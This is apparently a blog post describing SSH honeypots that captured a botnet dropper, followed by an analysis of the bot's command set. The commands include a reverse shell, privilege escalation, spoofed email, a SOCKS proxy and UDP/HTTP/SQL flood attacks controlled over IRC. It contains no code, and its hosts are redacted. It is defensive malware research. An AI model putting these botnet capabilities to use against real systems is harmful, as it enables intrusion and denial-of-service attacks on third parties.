Inside a botnet - part 1
I have had a couple of virtual private servers up and running for a couple of weeks. After a while an attacker used valid credentials and logged on to my server. He downloaded a couple of programs and scripts and suddenly my server was part of a botnet.
Catching the attacker
To catch an attacker in the act I set up a couple of SSH honeypots around the web. This can be easily done by renting a virtual private server for a couple of bucks, remove the default SSH server from the default port and set up a fake SSH server on port 22.
Attackers will try default and simple password to log on so I created a couple of fake accounts accepting "123456" and "admin" as passwords. In the first few days a few attackers tried to log in, some were successful but logged off directly after logging on. But guess what, they came back a few days later. And immediately downloaded a couple of programs and a script and tried to start these applications on my server. The honeypot denied the execution of the programs but we do have copy of them now.
SSH ServerSSH is a program used to connect to a remote server. This is done in a secure way (Secure Shell). You need a valid login and password and/or a security certificate to log on. Once you have logged on you have usually full control over the server
Analyzing the payload
The initial script was downloaded from http:// ██████████.pw/ which was started and downloaded a couple of new programs from http://192.227.███.███/ . The programs where compiled for a kinds of different hardware platforms ranging from WiFi-routers to 64bits linux servers. The payload consists of two parts: the first part would try to find new vulnerable hosts to connect to, to spread like a virus. The second part would connect to the command and control center at 192.227.███.███ on port 6667
Looking through the code of the "bot" it accepts a lot of commands from the remote control center.
|socks5||Installs SOCKS5 proxy server. If successful the hacked server can be used as a proxy for everyone on the internet.|
|portscan||Scans for open ports on a given host.|
|sendmail||Sends an e-mail with fake from fields to anyone on the internet from the hacked machine.|
|rootme||Tries several known vulnerabilities to get root access to the server.|
|nmap||Scans a remote host for open ports.|
|back||Connect to another server and start a shell. The attacker can then execute commands on the hacked server.|
|packetstorm||Reads and prints the headlines from packetstorm.org, a information security news website.|
|udpflood||Sends random UDP packets to a given host. The time to repeat this can be set in seconds.|
|udp||Sends random UDP packets to a given host. The time to repeat this can be set in seconds.|
|httpflood||Connects and disconnects to a given host. The time to repeat this can be set in seconds.|
|sqlflood||Sends random packets to the local MySQL server. The time to repeat this can be set in seconds.|
Sounds like a lot of fun if you are in the DDOS business. With a couple of hundred hacked servers around the world, all connected to a this IRC network you would be able to take down any website with a simple command.